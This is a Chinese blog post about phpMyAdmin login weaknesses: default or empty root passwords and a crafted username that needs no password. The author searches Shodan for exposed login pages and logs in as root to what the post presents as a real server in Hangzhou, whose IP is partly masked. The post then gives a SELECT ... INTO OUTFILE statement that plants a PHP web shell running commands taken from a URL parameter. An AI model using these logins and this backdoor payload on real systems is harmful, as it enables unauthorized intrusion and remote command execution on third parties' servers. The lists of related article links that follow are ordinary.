phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
聊天室php&amp;mysql(三)
Oct 09 PHP
说明的比较细的php 正则学习实例
Jul 30 PHP
PHP 危险函数全解析
Sep 09 PHP
php学习笔记 数组遍历实现代码
Jun 09 PHP
解决phpmyadmin中缺少mysqli扩展问题的方法
May 06 PHP
php遍历文件夹所有文件子文件夹函数代码
Nov 27 PHP
php无限极分类递归排序实现方法
Nov 11 PHP
php+jQuery.uploadify实现文件上传教程
Dec 26 PHP
浅析Yii2缓存的使用
May 10 PHP
PHP5.5新特性之yield理解与用法实例分析
Jan 11 PHP
Yii2.0框架模型添加/修改/删除数据操作示例
Jul 18 PHP
Thinkphp5.0框架使用模型Model的获取器、修改器、软删除数据操作示例
Oct 11 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
PHP Cookie的使用教程详解
2013/06/03 PHP
文件上传之SWFUpload插件(代码)
2015/07/30 PHP
php 利用array_slice函数获取随机数组或前几条数据
2015/09/30 PHP
Laravel5.1 框架路由基础详解
2020/01/04 PHP
PHP设计模式(八)装饰器模式Decorator实例详解【结构型】
2020/05/02 PHP
基于jquery的15款幻灯片插件
2011/04/10 Javascript
工作需要写的一个js拖拽组件
2011/07/28 Javascript
Javascript实现滑块滑动改变值的实现代码
2013/04/12 Javascript
JS通过ajax动态读取xml文件内容的方法
2015/03/24 Javascript
JavaScript中Array对象用法实例总结
2016/11/29 Javascript
webpack学习笔记之代码分割和按需加载的实例详解
2017/07/20 Javascript
Vue使用json-server进行后端数据模拟功能
2018/04/17 Javascript
React项目动态设置title标题的方法示例
2018/09/26 Javascript
Weex开发之地图篇的具体使用
2019/10/16 Javascript
微信小程序实现下滑到底部自动翻页功能
2020/03/07 Javascript
Vue自动构建发布脚本的方法示例
2020/07/24 Javascript
基于Vue中的父子传值问题解决
2020/07/27 Javascript
Antd-vue Table组件添加Click事件,实现点击某行数据教程
2020/11/17 Javascript
Python中使用item()方法遍历字典的例子
2014/08/26 Python
python执行外部程序的常用方法小结
2015/03/21 Python
Python中的面向对象编程详解(上)
2015/04/13 Python
Python编程之gui程序实现简单文件浏览器代码
2017/12/08 Python
Django实现支付宝付款和微信支付的示例代码
2018/07/25 Python
HTML5页面嵌入小程序没有返回按钮及返回页面空白的问题
2020/05/28 HTML / CSS
街头时尚在线:JESSICABUURMAN
2019/06/16 全球购物
英国家居用品和床上用品零售商:P&B Home
2020/01/16 全球购物
LVMH旗下最大的奢侈品网站平台:24S
2020/05/24 全球购物
最新计算机专业自荐信
2013/10/16 职场文书
保洁主管岗位职责
2013/11/20 职场文书
领导证婚人证婚词
2014/01/13 职场文书
超级搞笑检讨书
2014/01/15 职场文书
三年大学生活自我鉴定
2014/01/21 职场文书
岗位安全生产责任书
2014/07/28 职场文书
2015年社区服务活动总结
2015/03/25 职场文书
Python GUI编程之tkinter 关于 ttkbootstrap 的使用详解
2022/03/03 Python
html中两种获取标签内的值的方法
2022/06/10 HTML / CSS